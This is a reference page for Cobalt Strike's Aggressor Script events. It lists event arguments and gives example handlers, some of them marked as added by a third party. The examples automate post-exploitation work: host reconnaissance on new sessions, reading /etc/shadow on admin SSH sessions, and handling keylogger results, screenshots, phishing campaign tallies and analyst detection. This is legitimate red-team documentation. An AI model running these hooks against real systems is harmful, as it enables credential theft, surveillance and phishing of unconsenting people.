Events
These are the events fired by Aggressor Script.
*
This event fires whenever any Aggressor Script event fires.
Arguments
$1 - the original event name
... - the arguments to the event
Example
# event spy script
on * {
    println("[ $+ $1 $+ ]: " . subarray(@_, 1));
}
beacon_checkin
Fired when a Beacon checkin acknowledgement is posted to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the message
$3 - when this message occurred
beacon_error
Fired when an error is posted to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the message
$3 - when this message occurred
beacon_indicator
Fired when an indicator of compromise notice is posted to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the user responsible for the input
$3 - the text of the message
$4 - when this message occurred
beacon_initial
Fired when a Beacon calls home for the first time.
Arguments
$1 - the ID of the beacon that called home.
Example
on beacon_initial {
    # list established network connections
    bshell($1, "netstat -na | findstr \"ESTABLISHED\"");
    # list mapped network drives
    bshell($1, "net use");
    # list the current token's group memberships
    bshell($1, "whoami /groups");
}
beacon_initial_empty
Fired when a DNS Beacon calls home for the first time. At this point, no metadata has been exchanged.
Arguments
$1 - the ID of the beacon that called home.
Example
on beacon_initial_empty {
    binput($1, "[Acting on new DNS Beacon]");
    # change the data channel to DNS TXT
    bmode($1, "dns-txt");
    # request the Beacon checkin and send its metadata
    bcheckin($1);
}
beacon_input
Fired when an input message is posted to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the user responsible for the input
$3 - the text of the message
$4 - when this message occurred
beacon_mode
Fired when a mode change acknowledgement is posted to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the message
$3 - when this message occurred
beacon_output
Fired when output is posted to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the message
$3 - when this message occurred
beacon_output_alt
Fired when (alternate) output is posted to a Beacon's console. Alternate output is the same kind of message as normal output; the console simply presents it differently.
Arguments
$1 - the ID of the beacon
$2 - the text of the message
$3 - when this message occurred
beacon_output_jobs
Fired when jobs output is sent to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the jobs output
$3 - when this message occurred
beacon_output_ls
Fired when ls output is sent to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the ls output
$3 - when this message occurred
beacon_output_ps
Fired when ps output is sent to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the ps output
$3 - when this message occurred
beacon_tasked
Fired when a task acknowledgement is posted to a Beacon's console.
Arguments
$1 - the ID of the beacon
$2 - the text of the message
$3 - when this message occurred
beacons
Fired when the team server sends over fresh information on all of our Beacons. This occurs about once each second.
Arguments
$1 - an array of dictionary objects with metadata for each Beacon.
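Because this event delivers the full session list roughly once a second, it is a natural place for a watchdog. The following is an added example and not part of the original documentation: it notes each session the first time it appears and warns once when a session stops calling home. The dictionary keys it reads (id, user, computer, last) are the same keys beacon_info documents; the 15 minute threshold is an assumption and should match the longest sleep you expect to see.

```aggressor
# Added example (not from the Cobalt Strike documentation): stale-session watchdog
# driven by the beacons event. %seen tracks sessions already announced, %warned
# tracks sessions we have already flagged as silent.
global('%seen %warned $stale_ms');
$stale_ms = 15 * 60 * 1000;   # assumption: anything quiet longer than this is worth a look

on beacons {
    local('$entry $bid $last');
    foreach $entry ($1) {
        $bid  = $entry['id'];
        $last = $entry['last'];   # milliseconds since this Beacon last called home

        # first time this client has seen the session
        if ($bid !in %seen) {
            %seen[$bid] = 1;
            elog("[watchdog] tracking " . $entry['user'] . " on " . $entry['computer'] . " (" . $bid . ")");
        }

        # warn once when a session goes quiet; clear the flag when it returns
        if ($last > $stale_ms && $bid !in %warned) {
            %warned[$bid] = 1;
            elog("[watchdog] Beacon " . $bid . " on " . $entry['computer'] . " silent for " . int($last / 60000) . " minutes");
        }
        else if ($last <= $stale_ms && $bid in %warned) {
            removeAt(%warned, $bid);
            elog("[watchdog] Beacon " . $bid . " on " . $entry['computer'] . " is calling home again");
        }
    }
}
```

Sessions an operator removes simply stop appearing in the array, so they never trigger the "silent" branch; if you need to notice those, compare the set of ids in each delivery against %seen.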
custom_event_<event name>
Fired when a client receives a custom event from another client.
Arguments
$1 - who sent the custom event
$2 - the event data
$3 - the time the event was sent
Example
# subscribe to the my-topic custom event
on "custom_event_my-topic" {
    println("Received my-topic:");
    println("\tSender: $1");
    println("\tData: $2");
    println("\tTimestamp: $3");
}
disconnect
Fired when this Cobalt Strike becomes disconnected from the team server.
event_action
Fired when a user performs an action in the event log. This is similar to an action on IRC (the /me command).
Arguments
$1 - who the message is from
$2 - the contents of the message
$3 - the time the message was posted
event_beacon_initial
Fired when an initial beacon message is posted to the event log.
Arguments
$1 - the contents of the message
$2 - the time the message was posted
event_join
Fired when a user connects to the team server.
Arguments
$1 - who joined the team server
$2 - the time the message was posted
event_newsite
Fired when a new site message is posted to the event log.
Arguments
$1 - who setup the new site
$2 - the contents of the new site message
$3 - the time the message was posted
event_notify
Fired when a message from the team server is posted to the event log.
Arguments
$1 - the contents of the message
$2 - the time the message was posted
event_nouser
Fired when the current Cobalt Strike client tries to interact with a user who is not connected to the team server.
Arguments
$1 - who is not present
$2 - the time the message was posted
event_private
Fired when a private message is posted to the event log.
Arguments
$1 - who the message is from
$2 - who the message is directed to
$3 - the contents of the message
$4 - the time the message was posted
event_public
Fired when a public message is posted to the event log.
Arguments
$1 - who the message is from
$2 - the contents of the message
$3 - the time the message was posted
event_quit
Fired when someone disconnects from the team server.
Arguments
$1 - who left the team server
$2 - the time the message was posted
heartbeat_10m
Fired every ten minutes
heartbeat_10s
Fired every ten seconds
heartbeat_15m
Fired every fifteen minutes
heartbeat_15s
Fired every fifteen seconds
heartbeat_1m
Fired every minute
heartbeat_1s
Fired every second
heartbeat_20m
Fired every twenty minutes
heartbeat_30m
Fired every thirty minutes
heartbeat_30s
Fired every thirty seconds
heartbeat_5m
Fired every five minutes
heartbeat_5s
Fired every five seconds
heartbeat_60m
Fired every sixty minutes
keylogger_hit
Fired when there are new results reported to the web server via the cloned site keystroke logger.
Arguments
$1 - external address of visitor
$2 - reserved
$3 - the logged keystrokes
$4 - the phishing token for these recorded keystrokes.
keystrokes
Fired when Cobalt Strike receives keystrokes
Arguments
$1 - a dictionary with information about the keystrokes.
| Key | Value |
|---|---|
| bid | Beacon ID for session keystrokes originated from |
| data | keystroke data reported in this batch |
| id | identifier for this keystroke buffer |
| session | desktop session from keystroke logger |
| title | last active window title from keystroke logger |
| user | username from keystroke logger |
| when | timestamp of when these results were generated |
Example
on keystrokes {
    if ("*Admin*" iswm $1["title"]) {
        blog($1["bid"], "Interesting keystrokes received. Go to \c4View -> Keystrokes\o and look for the green buffer.");
        highlight("keystrokes", @($1), "good");
    }
}
profiler_hit
Fired when there are new results reported to the System Profiler.
Arguments
$1 - external address of visitor
$2 - de-cloaked internal address of visitor (or "unknown")
$3 - visitor's User-Agent
$4 - a dictionary containing the applications.
$5 - the phishing token of the visitor (use &tokenToEmail to resolve to an email address)
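The following is an added example, not code from the original documentation: it resolves each System Profiler visitor back to the phished address with tokenToEmail and keeps the reported applications per target so later decisions can consult them. It assumes the $4 dictionary is keyed by application name and that tokenToEmail yields an empty value when the visitor carried no token.

```aggressor
# Added example (not from the Cobalt Strike documentation): keep a per-target
# application inventory from profiler_hit. %profiles maps email (or a fallback
# label) to the applications dictionary the profiler reported.
global('%profiles');

on profiler_hit {
    local('$external $internal $ua %apps $token $who');
    ($external, $internal, $ua, %apps, $token) = @_;

    # assumption: tokenToEmail returns an empty value for visitors without a token
    $who = tokenToEmail($token);
    if ($who eq "") {
        $who = "untracked visitor from " . $external;
    }

    # remember what this target runs; assumption: keys of %apps are application names
    %profiles[$who] = %apps;

    elog("[profiler] " . $who . " (external " . $external . ", internal " . $internal . ") runs: " . join(", ", keys(%apps)));
}
```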
ready
Fired when this Cobalt Strike client is connected to the team server and ready to act.
screenshots
Fired when Cobalt Strike receives a screenshot.
Arguments
$1 - a dictionary with information about the screenshot.
| Key | Value |
|---|---|
| bid | Beacon ID for session screenshot originated from |
| data | raw screenshot data (this is a .jpg file) |
| id | identifier for this screenshot |
| session | desktop session reported by screenshot tool |
| title | active window title from screenshot tool |
| user | username from screenshot tool |
| when | timestamp of when this screenshot was received |
Example
# watch for any screenshots where someone is banking and
# redact it from the user-interface.
on screenshots {
    local('$title');
    $title = lc($1["title"]);
    if ("*bankofamerica*" iswm $title) {
        redactobject($1["id"]);
    }
    else if ("jpmc*" iswm $title) {
        redactobject($1["id"]);
    }
}
sendmail_done
Fired when a phishing campaign completes.
Arguments
$1 - the campaign ID
sendmail_post
Fired after a phish is sent to an email address.
Arguments
$1 - the campaign ID
$2 - the email we're sending a phish to
$3 - the status of the phish (e.g., SUCCESS)
$4 - the message from the mail server
sendmail_pre
Fired before a phish is sent to an email address.
Arguments
$1 - the campaign ID
$2 - the email we're sending a phish to
sendmail_start
Fired when a new phishing campaign kicks off.
Arguments
$1 - the campaign ID
$2 - number of targets
$3 - local path to attachment
$4 - the bounce to address
$5 - the mail server string
$6 - the subject of the phishing email
$7 - the local path to the phishing template
$8 - the URL to embed into the phish
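The four sendmail_* events above describe one campaign's lifecycle. The following is an added example, not part of the original documentation, that ties them together: it tallies delivery results per campaign ID and posts a summary to the event log when the campaign completes. It uses only the arguments the events document; "SUCCESS" is the status string the page itself cites.

```aggressor
# Added example (not from the Cobalt Strike documentation): per-campaign
# delivery tally built from sendmail_start, sendmail_pre, sendmail_post and
# sendmail_done. All three hashes are keyed by the campaign ID.
global('%sent %failed %targets');

on sendmail_start {
    %sent[$1]    = 0;
    %failed[$1]  = 0;
    %targets[$1] = $2;
    elog("[phish] campaign " . $1 . " started: " . $2 . " targets, subject '" . $6 . "'");
}

on sendmail_pre {
    # fires before each delivery; acts as a progress indicator on large runs
    elog("[phish] campaign " . $1 . " sending to " . $2);
}

on sendmail_post {
    if ($3 eq "SUCCESS") {
        %sent[$1] = %sent[$1] + 1;
    }
    else {
        # keep the mail server's reply; it usually explains a rejection
        %failed[$1] = %failed[$1] + 1;
        elog("[phish] campaign " . $1 . ": " . $2 . " failed (" . $3 . "): " . $4);
    }
}

on sendmail_done {
    elog("[phish] campaign " . $1 . " done: " . %sent[$1] . " sent, " . %failed[$1] . " failed, " . %targets[$1] . " targets");
}
```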
ssh_checkin
Fired when an SSH client checkin acknowledgement is posted to an SSH console.
Arguments
$1 - the ID of the session
$2 - the text of the message
$3 - when this message occurred
ssh_error
Fired when an error is posted to an SSH console.
Arguments
$1 - the ID of the session
$2 - the text of the message
$3 - when this message occurred
ssh_indicator
Fired when an indicator of compromise notice is posted to an SSH console.
Arguments
$1 - the ID of the session
$2 - the user responsible for the input
$3 - the text of the message
$4 - when this message occurred
ssh_initial
Fired when an SSH session is seen for the first time.
Arguments
$1 - the ID of the session
Example
on ssh_initial {
    if (-isadmin $1) {
        bshell($1, "cat /etc/shadow");
    }
}
ssh_input
Fired when an input message is posted to an SSH console.
Arguments
$1 - the ID of the session
$2 - the user responsible for the input
$3 - the text of the message
$4 - when this message occurred
ssh_output
Fired when output is posted to an SSH console.
Arguments
$1 - the ID of the session
$2 - the text of the message
$3 - when this message occurred
ssh_output_alt
Fired when (alternate) output is posted to an SSH console. Alternate output is the same kind of message as normal output; the console simply presents it differently.
Arguments
$1 - the ID of the session
$2 - the text of the message
$3 - when this message occurred
ssh_tasked
Fired when a task acknowledgement is posted to an SSH console.
Arguments
$1 - the ID of the session
$2 - the text of the message
$3 - when this message occurred
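The Beacon console events (beacon_tasked, beacon_output, beacon_error, beacon_input, beacon_indicator) and the SSH console events above carry the same argument shapes, so one handler serves both. The following is an added example, not code from the original documentation: it mirrors those events into one plain text file per session so a session's tasking, output and errors can be reviewed outside the client. $logdir is an assumption; dstamp, openf, println, closef, mkdir and -exists are Aggressor/Sleep built-ins.

```aggressor
# Added example (not from the Cobalt Strike documentation): append every
# console event to <logdir>/<session id>.log with a timestamp and a kind tag.
global('$logdir');
$logdir = "/tmp/cs-console";   # assumption: adjust for the client's host
if (!-exists $logdir) {
    mkdir($logdir);
}

# Append one timestamped line to the session's file. Opening the file per line
# is slow but leaves a consistent file if the client exits without warning.
sub log_line {
    local('$id $kind $text $when $handle');
    ($id, $kind, $text, $when) = @_;
    $handle = openf(">>" . $logdir . "/" . $id . ".log");
    println($handle, dstamp($when) . " [" . $kind . "] " . $text);
    closef($handle);
}

# acknowledgement, output and error events carry (id, text, when)
on beacon_tasked   { log_line($1, "task",   $2, $3); }
on beacon_output   { log_line($1, "output", $2, $3); }
on beacon_error    { log_line($1, "error",  $2, $3); }
on ssh_tasked      { log_line($1, "task",   $2, $3); }
on ssh_output      { log_line($1, "output", $2, $3); }
on ssh_error       { log_line($1, "error",  $2, $3); }

# input and indicator events carry (id, user, text, when); record the operator
on beacon_input     { log_line($1, "input:" . $2,     $3, $4); }
on beacon_indicator { log_line($1, "indicator:" . $2, $3, $4); }
on ssh_input        { log_line($1, "input:" . $2,     $3, $4); }
on ssh_indicator    { log_line($1, "indicator:" . $2, $3, $4); }
```

Each client that loads this script writes its own copy, so run it on one operator's client (or a dedicated headless client) rather than everywhere if you want a single record.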
web_hit
Fired when there's a new hit on Cobalt Strike's web server.
Arguments
$1 - the method (e.g., GET, POST)
$2 - the requested URI
$3 - the visitor's address
$4 - the visitor's User-Agent string
$5 - the web server's response to the hit (e.g., 200)
$6 - the size of the web server's response
$7 - a description of the handler that processed this hit.
$8 - a dictionary containing the parameters sent to the web server
$9 - the time when the hit took place.
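The following is an added example, not part of the original documentation: it raises event log notices for web server hits that do not match the traffic an operator expects, using the nine arguments listed above. The payload URI and the list of tool User-Agent strings are assumptions for this example and should be replaced with the values of the engagement.

```aggressor
# Added example (not from the Cobalt Strike documentation): flag unexpected
# web server traffic from web_hit. $payload_uri and @scripted_agents are
# constructed for this example.
global('$payload_uri @scripted_agents');
$payload_uri = "/download/update.txt";
@scripted_agents = @("curl", "python-requests", "wget", "go-http-client", "nmap");

# true when the User-Agent names a tool rather than a browser
sub looks_scripted {
    local('$needle');
    foreach $needle (@scripted_agents) {
        if ($needle isin lc($1)) {
            return 1;
        }
    }
    return 0;
}

on web_hit {
    local('$method $uri $addr $ua $status $size $handler %params $when');
    ($method, $uri, $addr, $ua, $status, $size, $handler, %params, $when) = @_;

    # anything but 200 means the visitor asked for a path we never served
    if ($status ne "200") {
        elog("[web] " . $addr . " got " . $status . " for " . $method . " " . $uri . " (" . $ua . ")");
    }

    # the payload pulled by a tool rather than a browser is often an analyst or sandbox
    if ($uri eq $payload_uri && looks_scripted($ua)) {
        elog("[web] " . $addr . " fetched " . $uri . " with " . $ua . ", handled by " . $handler);
    }

    # record which parameters arrived on POSTs so unexpected submissions stand out
    if ($method eq "POST" && size(%params) > 0) {
        elog("[web] POST from " . $addr . " to " . $uri . " with parameters: " . join(", ", keys(%params)));
    }
}
```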